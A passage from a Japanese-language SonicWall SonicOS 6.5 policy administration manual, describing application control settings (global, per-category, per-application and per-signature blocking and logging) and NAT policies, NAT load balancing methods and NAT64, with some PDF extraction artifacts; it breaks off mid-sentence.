SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定88

シグネチャ ID を選択すると、 そのシグネチャの 「SonicALERT」 ページが表示されます。

技術

ソフ トウェアの種別:• アプリケーシ ョ ン • ブラウザ • ネッ トワーク インフラス ト ラクチャ

リスク

各シグネチャのリスクのレベル:• 低 (緑色) • 警戒 (青色) • 中 (黄色) • 高 (オレンジ)• 深刻 (赤色)

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定89

アプリケーシ ョ ン シグネチャの詳細の表示

アプリケーシ ョ ン シグネチャの詳細を表示するには、 シグネチャの名前を選択します。 「アプ リ

ケーシ ョ ン シグネチャの詳細」 ポップアップ ダイアログが表示されます。

アプリケーシ ョ ン制御のグローバル設定の構成

「ルール > アプリケーシ ョ ン制御」 ページには、 次のグローバル設定が含まれています。

種別 シグネチャ アプリケーシ ョ ンの種別 ( 「APP-UPDATE」 、 「GAMING」 など)。

アプリケーシ ョ ン名

シグネチャ アプリケーシ ョ ンの名前。

警告度 警告度:• 低 • 中間 • 高

脅威度 シグネチャの脅威度:• 低 (緑色) • 警戒 (青色) • 中 (黄色) • 高 (オレンジ)• 深刻 (赤色)

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定90

• アプリケーシ ョ ン制御を有効にする

• すべてのアプリケーシ ョ ンをログする

• グローバル ログ冗長フ ィルタ間隔

• アプリケーシ ョ ン制御の設定

• アプリケーシ ョ ン制御の設定とポリシーをリセッ ト

アプリケーシ ョ ン制御はライセンスされたサービスであり、 この機能を使用するには該当するサービスも有効にする必要があります。 アプリケーシ ョ ン制御およびアプリケーシ ョ ン ルール ポリシーの

ログおよび除外リス ト を設定したり、 ポリシーを工場出荷時のデフォルトにリセッ トすることもできます。 詳細については、 アプリケーシ ョ ン制御のグローバル設定について (83 ページ) を参照して く

ださい。

ト ピック :

• アプリケーシ ョ ン制御の有効化 (91 ページ)

• ログとログ フ ィルタ間隔の設定 (92 ページ)

• アプリケーシ ョ ン制御ポリシーのグローバル除外リストの設定 (93 ページ)

• アプリケーシ ョ ン制御設定とポリシー設定を工場出荷時の既定値に戻す (94 ページ)

アプリケーシ ョ ン制御の有効化アプリケーシ ョ ン制御を使用するには、 グローバルに有効にする必要があります。 また、 アプリケーシ ョ ン ト ラフ ィ ッ クのあるネッ トワーク ゾーンで有効にする必要があります。

グローバルなアプリケーシ ョ ン制御の有効化

アプリケーシ ョ ン制御をグローバルに有効にするには :

1 管理ビューで、 「ポリシー | ルール > アプリケーシ ョ ン制御」 ページを開きます。

1 「アプリケーシ ョ ン制御」 チェ ッ クボックスをオンにします。

2 「適用」 を選択します。

ゾーンごとのアプリケーシ ョ ン制御の有効化

アプリケーシ ョ ン制御をネッ トワーク ゾーンごとに有効にするには:

1 管理ビューで、 「システム セッ トアップ | ネッ トワーク > ゾーン」 ページを開きます。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定91

2 設定するゾーンの設定アイコンを選択します。 「ゾーンの編集」 ダイアログが表示されます。

3 「アプリケーシ ョ ン制御サービスを有効にする」 チェ ッ クボックスをオンにします。

4 「OK」 を選択します。

「ネッ トワーク > ゾーン」 ページでは、 アプリケーシ ョ ン制御サービスが有効になっているす

べてのゾーンの 「アプリケーシ ョ ン制御」 列に緑色のインジケータが表示されます。

ログとログ フ ィルタ間隔の設定

すべてのアプリケーシ ョ ンでログを有効して、 冗長フ ィルタ間隔を指定するには:

1 管理ビューで、 「ポリシー | ルール > アプリケーシ ョ ン制御」 ページを開きます。

1 「すべてのアプリケーシ ョ ンをログする」 チェ ッ クボックスをオンにします。

2 「グローバル ログ冗長フ ィルタ間隔」 フ ィールドに、 グローバル ログ冗長フ ィルタの間隔を秒

数で入力します。 範囲は 0~86400 秒で、 既定値は 60 秒です。

3 「適用」 ボタンを選択します。

メモ : アプリケーシ ョ ン制御ポリシーがあるネッ トワーク ゾーン内のト ラフ ィ ッ クに適

用されるのは、 そのゾーンでアプリケーシ ョ ン制御サービスを有効にしている場合に限ります。 アプリケーシ ョ ン ルール ポリシーは独立しており、 ネッ トワーク ゾーンに対す

るアプリケーシ ョ ン制御の設定には影響されません。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定92

アプリケーシ ョ ン制御ポリシーのグローバル除外リストの設定

除外リスト を設定するには、 次の手順に従います。

1 管理ビューで、 「ポリシー | ルール > アプリケーシ ョ ン制御」 ページを開きます。

1 「アプリケーシ ョ ン制御の設定」 ボタンを選択します。 「アプリケーシ ョ ン制御除外リス ト」ダイアログが開きます。

2 グローバル除外リス ト を有効にするには、 「アプリケーシ ョ ン制御除外リス ト を有効にする」チェ ッ クボックスをオンにします。 このオプシ ョ ンは、 既定では選択されています。

3 IPS 除外リストを使用するには、 「IPS 除外リストを有効にする」 ラジオ ボタンを選択し、 「OK」を選択します。 このオプシ ョ ンは、 既定では選択されています。

IPS 除外リストは、 管理 ビューの 「セキュリテ ィ設定 |セキュリテ ィ サービス > 侵入防止」 ペー

ジを参照して ください。

4 除外リストでアドレス オブジェク ト を使用するには、 「アプリケーシ ョ ン制御除外アドレス オブジェ ク ト を使用する」 ラジオ ボタンを選択します。 ドロップダウン メニューが使用可能に

なります。

5 ドロップダウン メニューからアドレス オブジェク トを選択します。 または 「アドレス オブジェ

ク トの作成」 を選択します)。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定93

6 「OK」 を選択します。

アプリケーシ ョ ン制御設定とポリシー設定を工場出荷時の既定値に戻す

アプリケーシ ョ ン制御設定とポリシー設定を工場出荷時の既定値に戻すには:

1 管理ビューで、 「ポリシー | ルール > アプリケーシ ョ ン制御」 ページを開きます。

1 「アプリケーシ ョ ン制御の設定とポリシーをリセッ ト 」 ボタンを選択します。 確認メ ッセージが表示されます。

2 「OK」 を選択します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定94

アプリケーシ ョ ン制御の種別ごとの設定 種別に基づ く設定は、 「ルール > アプリケーシ ョ ン制御」 ページで も広範囲にわたるポリシー設定

の方法です。 種別のリス トは、 「シグネチャ種別」 ドロップダウン メニューで使用できます。

アプリケーシ ョ ン制御ポリシーをアプリケーシ ョ ン種別に対して設定するには:

1 管理ビューで、 「ポリシー | ルール > アプリケーシ ョ ン制御」 ページを開きます。

2 「アプリケーシ ョ ン制御詳細」 の下にある 「種別」 ドロップダウン メニューからアプリケー

シ ョ ン種別を選択します。 種別を選択すると、 フ ィールドの右側に 「設定」 ボタンが有効になります。

3 「設定」 ボタンを選択して、 選択した種別の 「アプリケーシ ョ ン制御種別の編集」 ダイアログを表示します。

4 この種別のアプリケーシ ョ ンを遮断するには、 「遮断」 ドロップダウン メニューで 「有効」 を

選択します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定95

5 この種別のアプリケーションが検出されたときにログ エント リを作成するには、 「ログ」 ドロッ

プダウン リス トで 「有効」 を選択します。

6 選択した遮断やログ記録の動作の対象を特定のユーザまたはユーザのグループに設定するには、「包含するユーザ/グループ」 ドロップダウン メニューからユーザ グループまたは個々のユーザ

を選択します。 「すべて」 を選択すると、 このポリシーがすべてのユーザに適用されます。

7 選択した遮断やログ記録の動作の対象から特定のユーザまたはユーザのグループを除外するには、 「除外するユーザ/グループ」 ドロップダウン メニューからユーザ グループまたは個々の

ユーザを選択します。 「なし」 を選択すると、 このポリシーがすべてのユーザに適用されます。

8 選択した遮断やログ記録の動作の対象を特定の IP アドレスまたはアドレス範囲に設定するには、

「包含する IP アドレス範囲」 ドロップダウン メニューからアドレス グループまたはアドレス

オブジェク ト を選択します。 「すべて」 を選択すると、 このポリシーがすべての IP アドレスに

適用されます。

9 選択した遮断やログ記録の動作の対象から特定の IP アドレスまたはアドレス範囲を除外するに

は、 「除外する IP アドレス範囲」 ドロップダウン メニューからアドレス グループまたはアド

レス オブジェ ク ト を選択します。 「なし」 を選択すると、 このポリシーがすべての IP アドレ

スに適用されます。

10 このポリシーを特定の曜日や特定の時間だけ有効にするには、 「スケジュール」 ドロップダウン メニューから次のスケジュールのいずれかを選択します。

11 既定では、 「グローバル設定を使用」 オプシ ョ ンが選択されており、 既定値の 60 秒を変更でき

ません (フ ィールドは淡色表示になっています)。 繰り返し発生するイベン トのログ エン ト リ間

隔を変更するには:

a 「グローバル設定を使用」 チェ ッ クボッ クスをオフにします。 フ ィールドが使用可能になります。

b 「ログ冗長フ ィルタ (秒)」 フ ィールドに間隔を秒数で入力します。 小秒数は 0 (間隔な

し )、 大秒数は 999999、 既定値は 0 です。

12 「OK」 を選択します。

スケジュール オプシ ョ ン

スケジュール ポリシーを有効にする期間

常に有効 常時。 このオプシ ョ ンは、 既定では選択されています。

勤務時間 月曜日から金曜日の午前 8:00 から午後 5:00 まで。

月-火-水-木-金 08:00 から 17:00 月曜日から金曜日の午前 8:00 から午後 5:00 まで ( 「勤務時

間」 と同じ )。

時間外 月曜日から金曜日の午後 5:00 から翌午前 8:00 まで。

月-火-水-木-金 0:00 から 8:00 月曜日から金曜日の深夜 0:00 から午前 8:00 まで。

月-火-水-木-金 17:00 から 24:00 月曜日から金曜日の午後 5:00 から深夜 0:00 まで。

土-日 00:00 から 24:00 日曜日から土曜日まで毎日 24 時間 ( 「常に有効」 と同じ )。

週末時間 金曜日の午後 5:00 から月曜日の午前 8:00 まで。

AppFlow 報告時間 AppFlow 報告が設定されている時間。

日-月-火-水-木-金-土 00:00 から24:00

日曜日から土曜日まで毎日 24 時間 ( 「常に有効」 と同じ )。

TSR 報告時間 TSR 報告が設定されている時間。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定96

アプリケーシ ョ ン制御のアプリケーシ ョ ンごとの

設定 アプリケーシ ョ ンに基づ く設定は、 「ルール > アプリケーシ ョ ン制御」 ページでの中間レベルのポリ

シー設定であり、 種別に基づく レベルとシグネチャに基づ く レベルの中間に位置付けられます。

この設定方法では、 同じ種別内の他のアプリケーシ ョ ンに影響を及ぼすこ とな く単一のアプリケーシ ョ ンのシグネチャに対してのみポリシーを執行する場合に、 そのアプリケーシ ョ ンに特定のポリシー ルールを作成できます。

アプリケーシ ョ ン制御ポリシーを特定のアプリケーシ ョ ンに対して設定するには:

1 管理ビューで、 「ポリシー | ルール > アプリケーシ ョ ン制御」 ページを開きます。

2 (オプシ ョ ン) 「アプリケーシ ョ ン制御詳細」 の下にある 「シグネチャ種別」 ドロップダウン メ

ニューから種別を選択します。 これによって、 アプリケーシ ョ ンを選択しやす く なります。

3 「アプリケーシ ョ ン」 ドロップダウン リス トからアプリケーシ ョ ンを選択します (種別を選択

しなかった場合は、 選択したアプリケーシ ョ ンの種別に変わります)。 アプリケーシ ョ ンを選

択すると、 フ ィールドの右側に 「設定」 ボタンが表示されます。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定97

4 「設定」 ボタンを選択して、 選択したアプリケーシ ョ ンの 「アプリケーシ ョ ン制御アプリケーシ ョ ンの設定」 ダイアログを表示します。

このダイアログの上部にあるフ ィールド 「アプリケーシ ョ ン種別」 および 「アプリケーシ ョ ン名」 は編集できません。 他の設定パラ メータには、 アプリケーシ ョ ンが属する種別の現在の設定が既定で設定されます。 種別の設定に対するこの関係を 1 つ以上のフ ィールドで維持するに

は、 それらのフ ィールドでのこ う した選択をそのままにしておきます。

5 このアプリケーシ ョ ンを遮断するには、 「遮断」 ドロップダウン メニューで 「有効」 を選択し

ます。

6 このアプリケーシ ョ ンが検出されたときにログ エン ト リを作成するには、 「ログ」 ドロップダ

ウン メニューで 「有効」 を選択します。

7 選択した遮断やログ記録の動作の対象を特定のユーザまたはユーザのグループに設定するには、「包含するユーザ/グループ」 ドロップダウン メニューからユーザ グループまたは個々のユーザ

を選択します。 「すべて」 を選択すると、 このポリシーがすべてのユーザに適用されます。

8 選択した遮断やログ記録の動作の対象から特定のユーザまたはユーザのグループを除外するには、 「除外するユーザ/グループ」 ドロップダウン メニューからユーザ グループまたはユーザ

を選択します。 「なし」 を選択すると、 このポリシーがすべてのユーザに適用されます。

ヒ ン ト : アプ リケーシ ョ ンの 「遮断」 設定が 「種別設定の使用 」 に設定されている場

合、 このメ ッセージは次のように表示されます。

カテゴリ設定がアプリケーシ ョ ンの設定を上書きしないよ うにするには、 必要に応じて「遮断」 の設定を 「有効」 または 「無効」 に変更し、 このダイアログで必要な値を選択します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定98

9 選択した遮断やログ記録の動作の対象を特定の IP アドレスまたはアドレス範囲に設定するには、

「包含する IP アドレス範囲」 ドロップダウン メニューからアドレス グループまたはアドレス

オブジェク ト を選択します。 「すべて」 を選択すると、 このポリシーがすべての IP アドレスに

適用されます。

10 選択した遮断やログ記録の動作の対象から特定の IP アドレスまたはアドレス範囲を除外するに

は、 「除外する IP アドレス範囲」 ドロップダウン メニューからアドレス グループまたはアド

レス オブジェ ク ト を選択します。 「なし」 を選択すると、 このポリシーがすべての IP アドレ

スに適用されます。

11 このポリシーを特定の曜日や特定の時間だけ有効にするには、 「スケジュール」 ドロップダウン メニューからスケジュールのいずれかを選択します。 スケジュールのリス トについては、 ス

ケジュール オプシ ョ ンを参照して ください。

12 既定では、 「ログ冗長フ ィルタ (秒)」 の 「種別設定を使用」 オプシ ョ ンが選択されています。

フ ィールドは淡色表示になっていて変更できません。 繰り返し発生するイベン トのログ エン ト

リ間隔を変更するには:

a 「グローバル設定を使用」 チェ ッ クボッ クスをク リアします。 フ ィールドが使用可能になります。

b 「ログ冗長フ ィルタ (秒)」 フ ィールドに間隔を秒数で入力します。 小秒数は 0 (間隔な

し )、 大秒数は 999999、 既定値は 0 です。

13 「OK」 を選択します。

シグネチャによるアプリケーシ ョ ン制御の設定シグネチャに基づ く設定は、 「ルール > アプリケーシ ョ ン制御」 ページでの 下位 ( も具体的な) レベルの設定です。

特定のシグネチャに基づ くポリシーを設定すると、 同じアプリケーシ ョ ンの他のシグネチャに影響を及ぼすことな く個々のシグネチャに対してポリシーを設定できます。

アプリケーシ ョ ン制御ポリシーを特定のシグネチャに対して設定するには:

1 管理ビューで、 「ポリシー | ルール > アプリケーシ ョ ン制御」 ページを開きます。

2 「アプリケーシ ョ ン制御詳細」 テーブルまでスクロールします。

3 「表示方法 」 ド ロップダウン メニューで 「シグネチャ」 を選択します。

4 設定するシグネチャの行にある 「設定」 ボタンを選択します。 「アプリケーシ ョ ン制御シグネチャの編集」 ダイアログが表示されます。

ヒン ト : 必要に応じて、 「カテゴリ」 ド ロ ップダウン メニューまたは 「アプリケーシ ョ

ン」 ド ロップダウン メニューからカテゴリを選択して、 表示されるシグネチャの数を減

らします。

ヒン ト : シグネチャのシグネチャ ID がわかっている場合は、 「検索するシグネチャ ID」フ ィールドに入力し、 「検索」 アイコンを選択します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定99

このダイアログの上部にあるフ ィールドは編集できません。 これらのフ ィールドには、 「シグネチャ種別」 、 「シグネチャ名」 、 「シグネチャ ID」 、 「アプ リ ケーシ ョ ン ID」 、 「危険

度」 、 このシグネチャが属する種別およびアプリケーシ ョ ンのト ラフ ィ ッ クの 「方向」 の値が表示されます。

シグネチャに対する他の設定には、 シグネチャが属するアプリケーシ ョ ンの現在の設定が使用されます。 アプリケーシ ョ ンの設定に対するこの関係を 1 つ以上のフ ィールドで維持するに

は、 それらのフ ィールドでのこ う した選択をそのままにしておきます。

5 このシグネチャを遮断するには、 「遮断」 ドロップダウン メニューで 「有効」 を選択します。

ヒン ト : シグネチャの 「遮断」 設定が 「ユーザ アプリケーシ ョ ン設定の使用 」 に設定さ

れている場合、 このメ ッセージは次のように表示されます。

アプリケーシ ョ ン設定がシグネチャの設定を上書きしないよ うにするには、 必要に応じて 「遮断」 の設定を 「有効」 または 「無効」 に変更し、 このダイアログで必要な値を選択します。

ヒン ト : アプリケーシ ョ ン情報を編集するには、 「アプリケーシ ョ ン ID」 フ ィールドの

横にある編集アイコンを選択します。 「アプリケーシ ョ ン制御: アプリケーシ ョ ンの編

集」 ダイアログが表示されます。 このダイアログの設定の詳細については、 アプリケーシ ョ ン制御のアプリケーシ ョ ンごとの設定 (97 ページ) を参照して ください。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定100

6 このシグネチャが検出されたときにログ エン ト リを作成するには、 「ログ」 ドロップダウン メニューで 「有効」 を選択します。

7 選択した遮断やログ記録の動作の対象を特定のユーザまたはユーザのグループに設定するには、「包含するユーザ/グループ」 ドロップダウン メニューからユーザ グループまたは個々のユーザ

を選択します。 「すべて」 を選択すると、 このポリシーがすべてのユーザに適用されます。

8 選択した遮断やログ記録の動作の対象から特定のユーザまたはユーザのグループを除外するには、 「除外するユーザ/グループ」 ドロップダウン メニューからユーザ グループまたは個々の

ユーザを選択します。 「なし」 を選択すると、 このポリシーがすべてのユーザに適用されます。

9 選択した遮断やログ記録の動作の対象を特定の IP アドレスまたはアドレス範囲に設定するには、

「包含する IP アドレス範囲」 ドロップダウン メニューからアドレス グループまたはアドレス

オブジェク ト を選択します。 「すべて」 を選択すると、 このポリシーがすべての IP アドレスに

適用されます。

10 選択した遮断やログ記録の動作の対象から特定の IP アドレスまたはアドレス範囲を除外するに

は、 「除外する IP アドレス範囲」 ドロップダウン メニューからアドレス グループまたはアド

レス オブジェ ク ト を選択します。 「なし」 を選択すると、 このポリシーがすべての IP アドレ

スに適用されます。

11 このポリシーを特定の曜日や特定の時間だけ有効にするには、 「スケジュール」 ドロップダウン メニューからスケジュールのいずれかを選択します。 スケジュールのリス トについては、 ス

ケジュール オプシ ョ ンを参照して ください。

12 既定では、 「ログ冗長フ ィルタ (秒)」 の 「種別設定を使用」 オプシ ョ ンが選択されています。

フ ィールドは淡色表示になっていて変更できません。 繰り返し発生するイベン トのログ エン ト

リ間隔を変更するには:

a 「グローバル設定を使用」 チェ ッ クボッ クスをオフにします。 フ ィールドが使用可能になります。

b 「ログ冗長フ ィルタ (秒)」 フ ィールドに間隔を秒数で入力します。 小秒数は 0 (間隔な

し )、 大秒数は 999999、 既定値は 0 です。

13 シグネチャに関する詳細な情報を確認するには、 ダイアログ下部の 「補足」 にある 「ここを選択」 を選択します。

14 「OK」 を選択します。

SonicWall SonicOS 6.5 ポリシー管理

アプリケーシ ョ ン制御の設定101

4

NAT ポリシーの設定

• ルール > NAT ポリシー (102 ページ)

• SonicOS での NAT について (103 ページ)

• NAT 負荷分散について (104 ページ)

• NAT64 について (106 ページ)

• NAT ポリシー エン ト リの表示 (107 ページ)

• 「 NAT または NAT64 の追加または編集」 ポリシー (108 ページ)

• NAT ポリシーの削除 (113 ページ)

• NAT ポリシーの作成例 (114 ページ)

ルール > NAT ポリシー

ト ピッ ク :

• SonicOS での NAT について (103 ページ)

• NAT 負荷分散について (104 ページ)

• NAT64 について (106 ページ)

• NAT ポリシー エン ト リの表示 (107 ページ)

• 「 NAT または NAT64 の追加または編集」 ポリシー (108 ページ)

• NAT ポリシーの削除 (113 ページ)

• NAT ポリシーの作成例 (114 ページ)

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定102

SonicOS での NAT について

SonicOS のネッ トワーク アドレス変換 (NAT) エンジンでは、 送受信ト ラフ ィ ッ クに関して、 きめ細か

な NAT ポリシーを定義できます。 既定では、 X0 インターフェースに接続されたすべてのシステムに対

して X1 インターフェースの IP アドレスを使用する多対 1 の NAT の実行を許可する NAT ポリシーと、

ト ラフ ィ ッ クがその他のインターフェース間を転送される場合には NAT を行わないポリシーが、 ファ

イアウォールに事前設定されています。 このセクシ ョ ンでは、 も一般的な NAT ポリシーの設定方法

について説明します。

NAT ポリシーの使用方法を理解するには、 まず IP パケッ トの構築から調査します。 各パケッ トにはアド

レッシング情報が含まれており、 それによって、 パケッ トが送信先に到達すること と、 送信先が要求元に対して応答を返すことが可能になっています。 パケッ トには (その他の情報とともに)、 要求元の

IP アドレス、 要求元のプロ ト コル情報、 および送信先の IP アドレスが格納されています。 SonicOS のNAT ポリシー エンジンは、 パケッ ト内の NAT に関連する部分を検査したり、 送信ト ラフ ィ ックだけで

な く受信ト ラフ ィ ッ クの指定されたフ ィールドの情報を動的に書き換えたりすることができます。

SonicWall ネッ トワークセキュリテ ィプラ ッ ト フォームに応じて 大 512 ~ 2048 の NAT ポリシーを追

加できます。 必要なだけ細かく設定できます。 また、 同じオブジェク ト を対象とする複数の NAT ポリ

シーを作成することも可能です。 これにより、 例えば、 内部サーバが Telnet サーバにアクセスする際

には特定の 1 つの IP アド レスを使用して、 その他のすべてのプロ ト コルの通信にはまった く別の IPアドレスを使用するように指定することもできます。 SonicOS の NAT エンジンは受信ポート転送をサ

ポート しているため、 フ ァイアウォールの WAN IP アドレスから複数の内部サーバを隠蔽することが

できます。 NAT ポリシーは粒度が細かく なればなるほど優先順位が高く なります。

フ ァイアウォールの各モデルで使用可能なルート と NAT ポリシーの 大数テーブルは、 SonicOS 6.5で実行中の各ネッ トワーク セキュリティ装置モデルで可能なルート と NAT ポリシーの 大数の一覧です。

重要 : NAT ポリシーを設定する前に、 そのポリシーに関連付けるすべてのアドレス オブジェ ク

ト を作成して ください。 例えば、 1 対 1 の NAT ポリシーを作成する場合は、 パブリ ックおよびプ

ライベートの IP アドレスを表すアドレス オブジェク トが必要です。

ヒン ト : 既定では、 LAN から WAN へのト ラフ ィ ッ クにはファイアウォールで事前に定義された

NAT ポリシーが適用されます。

ファイアウォールの各モデルで使用可能なルート と NAT ポリシーの 大数

モデルルート

NAT ポリシー モデルルート

NAT ポリシー静的 動的 静的 動的

SM 9800 3072 4096 2048 TZ600 256 1024 512

SM 9600 3072 4096 2048 TZ500/TZ500W 256 1024 512

SM 9400 3072 4096 2048 TZ400/TZ400W 256 1024 512

SM 9200 3072 4096 2048 TZ300/TZ300W 256 1024 512

NSA 6600 2048 4096 2048

NSA 5600 2048 4096 2048

NSA 4600 1088 2048 1024 SOHO W 256 1024 512

NSA 3600 1088 2048 1024

NSA 2650 1088 2048 1024

NSA 2600 1088 2048 1024

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定103

用語集

NAT 負荷分散について ネッ トワーク アドレス変換 (NAT) と負荷分散 (LB) の機能を組み合わせると、 受信ト ラフ ィ ッ クの負荷

を複数の類似したネッ トワーク リソースに分散することができます。 これを SonicOS のフェイルオー

バーと負荷分散機能と混同しないで く ださい。 両方の機能を併用するこ とができますが、 フ ェールオーバーと負荷分散を使用して WAN 接続をアクテ ィ ブに監視し、 WAN インターフ ェースの障害/復旧に応じて動作し、 NAT LB は主に着信ト ラフ ィ ッ クのバランスをとるために使用されます。

負荷分散は、 ト ラフ ィ ッ クを複数の類似したネッ トワーク リ ソースに振り分けるこ とによって、 単

一のサーバに過大な負荷がかかるこ とを防ぎ、 信頼性と冗長性の向上に貢献します。 また、 1 つの

サーバが使用できない状態になった場合でも、 ト ラフ ィ ッ クは使用可能なリ ソースに転送されるため、 システム稼働時間の 大化が実現されます。

ここでは、 パブリ ッ ク インターネッ トのシステムから、 1 つまたは複数の内部システム (ウェブ サー

バ、 FTP サーバ、 SonicWall SMA 装置など) に割り当てられた仮想 IP へのアクセスを可能にするために

必要な NAT、 負荷分散、 健全性チェ ック、 ログ記録、 およびファイアウォール ルールの設定方法につ

いて詳し く説明します。 対象のポートがファイアウォール自体では使用されていない場合、 この仮想

IP は、 ファイアウォールとは無関係に設定されているものや、 共有で使用されているものでも問題あ

りません。

参考資料:

• 使用する NAT LB 方式の決定 (105 ページ)

• 注意 (105 ページ)

• 負荷分散アルゴリズムの適用方法 (105 ページ)

• ステ ィ ッキー IP アルゴリズムの例 (106 ページ)

DNS64 IPv6 クライアン トから IPv4 サーバへのネッ トワーク アドレス変換のための

DNS 拡張

IPv4 に変換された IPv6 アドレス

IPv6 ネッ トワークで IPv4 ノードを表すために使用される IPv6 アドレス

IPv4 が埋め込まれた IPv6 アドレス

32 ビッ トに IPv4 アドレスが格納されている IPv6 アドレス

NAT ネッ トワーク アドレス変換

NAT64 IPv6 クライアン トから IPv4 サーバへのネッ トワーク アドレスおよびプロ ト

コルのステート フル変換

NATPT ネッ トワーク アドレス変換 - プロ ト コル変換

PMTUD 経路 MTU 探索

XLAT IP/ICMP ト ランスレータ

メモ : SonicOS に搭載されている負荷分散機能は、 それほど高度なものではありませんが、 多く

のネッ トワーク配備の要件を十分に満たす能力を備えています。 さ らに粒度の細かい負荷分散や恒久性と健全性チェ ッ クのメ カニズムが必要なネッ トワークの場合は、 サードパーテ ィ製の専用の負荷分散装置を使用することをお勧めします。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定104

使用する NAT LB 方式の決定

注意• 利用可能な健全性チェ ック メカニズムは 2 種類 (ICMP Ping と TCP ソケッ ト オープン) のみです。

• 上位層の恒久性メカニズムは利用できません (ステ ィ ッキー IP のみ使用可能)。

• グループ内のすべてのサーバが応答しない場合に備えるための “Sorry-Server" メ カニズムは利用

できません。

• “恒久性を備えたラウンド ロビン" メ カニズムは利用できません。

• “重み付きラウンド ロビン" メ カニズムは利用できません。

• リソースが過負荷になっていることを検出する手段は用意されていません。

SonicWall ネッ トワーク セキュリテ ィ装置では、 負荷分散の対象と して設定可能な内部リソースの数

に制限はな く、 監視可能なホストの数にも制限はありませんが、 (リソースの数が 25 を超えるような)非常に大規模な負荷分散グループを作成すると、 パフォーマンスに影響が及ぶおそれがあります。

負荷分散アルゴリズムの適用方法

使用する NAT LB 方式を決定する

要件 配備例 NAT LB 方式

サーバ負荷の均等な分散 (恒久性は

不要)外部/内部サーバ (ウェブまたは FTP) ラウンド ロビン

無差別な負荷分散 (恒久性は不要) 外部/内部サーバ (ウェブまたは FTP) ランダム分散

クライアン ト接続の恒久性 電子商取引サイ ト、 電子メール セキュ

リテ ィ、 SonicWall SMA 装置

(恒久性が要求される任意の公開サーバ)

ステ ィ ッキー IP

送信元ネッ ト ワークから送信先範囲への再割付の精密な制御

LAN から DMZ サーバへ

電子メ ール セキュ リ テ ィ、 SonicWallSMA 装置

ブロック再割付

送信元ネッ ト ワーク と送信先ネットワークの再割付の精密な制御

内部サーバ (イン ト ラネッ ト またはエ

クスト ラネッ ト )対称再割付

ラウンド ロビン 送信元 IP を各送信先 IP に交互に接続します。

ランダム分散 送信元 IP は、 各送信先 IP にランダムに接続されます。

ステ ィ ッキー IP 送信元 IP を常に同じ送信先 IP に接続します。

ブロック再割付 送信元ネッ トワークを送信先プールのサイズに分割するこ とによって、 論理セグメン ト を作成します。

対称再割付 送信元 IP を送信先 IP に割り付けます (例えば、 10.1.1.10->192.168.60.10)。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定105

ステ ィ ッキー IP アルゴリズムの例

送信元 IP をサーバ クラスタの台数で除算し、 その剰余に応じて割付先のサーバを決定します。 以下

に、 ステ ィ ッキー IP アルゴリズムによる割付先決定処理の例を 2 つ示します。

• 例 1 - ネッ トワークへの割付 (106 ページ)

• 例 2 - IP アドレス範囲への割付 (106 ページ)

例 1 - ネッ トワークへの割付

192.168.0.2~192.168.0.4 変換後の送信先 = 10.50.165.0/30 (ネッ トワーク )

パケッ トの送信元 IP = 192.168.0.2 192.168.0.2 = C0A80002 = 3232235522 = 11000000101010000000000000000010 (IP->16 進->10 進->2 進)

ステ ィ ッキー IP 計算式 = パケッ トの送信元 IP = 3232235522[剰余算]変換先サイズ = 2= 3232235522[剰余算]2= 0 (被乗数は 2 で割り切れる)。 剰余はな く、 結果は 0)

ステ ィ ッキー IP 計算式によって算出されたオフセッ トは 0。

送信先を 10.50.165.1 に再割付。

例 2 - IP アドレス範囲への割付

192.168.0.2~192.168.0.4 変換後の送信先 = 10.50.165.1 ~ 10.50.165.3 (範囲)

パケッ トの送信元 IP = 192.168.0.2 192.168.0.2 = C0A80002 = 3232235522 = 11000000101010000000000000000010 (IP->16 進->10 進->2 進)

ステ ィ ッキー IP 計算式 = パケッ トの送信元 IP = 3232235522[剰余算]変換先サイズ = 3 = 3232235522[剰余算]4 = 1077411840.6666667 - 1077411840 = 0.6666667 * 3 = 2

ステ ィ ッキー IP 計算式によって算出されたオフセッ トは 2。

送信先を 10.50.165.3 に再割付

NAT64 についてSonicOS では、 NAT64 ト ランスレータ と呼ばれる、 IPv6 から IPv4 への変換を行うデバイスを利用して

IPv6 専用クライアン トが IPv4 専用サーバにアクセスできる NAT64 機能をサポート しています。 NAT64は、 旧来の IPv4 専用サーバに IPv6 ネッ ト ワークからアクセスする機能を提供します。 その場合、

NAT64 対応の SonicWall が中間ルータとして配置されます。

SonicOS を NAT64 ト ランスレータ と して使用すると、 任意のゾーンにある IPv6 専用クライアン トか

ら、 適切なルートが設定された IPv4 専用サーバへの通信を開始できます。 SonicOS によって IPv6 アド

レスは IPv4 アド レスにマッピングされ、 IPv6 ト ラフ ィ ッ クが IPv4 ト ラフ ィ ッ クに変わります。 その

逆も同様です。 IPv6 と IPv4 の間のパケッ ト ヘッダーの変換によってこのマッピングを可能にするた

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定106

めに、 IPv6 アドレス プール (アドレス オブジェク ト と して表されます) と IPv4 アドレス プールが作成

されます。 IPv4 ホス トの IPv4 アドレスは、 SonicOS で設定された IPv6 接頭辞を使用して、 IPv6 アドレ

スと双方向で変換されます。

DNS64 ト ランスレータは NAT64 機能を有効にします。 IPv6 クライアン トによって DNS64 サーバを設定

するか、 IPv6 クライアン トがゲートウェイから自動取得する DNS サーバ アドレスが DNS64 サーバに

なっている必要があります。 IPv6 専用クライアン トの DNS64 サーバは、 A レコード (IPv4) を用いて

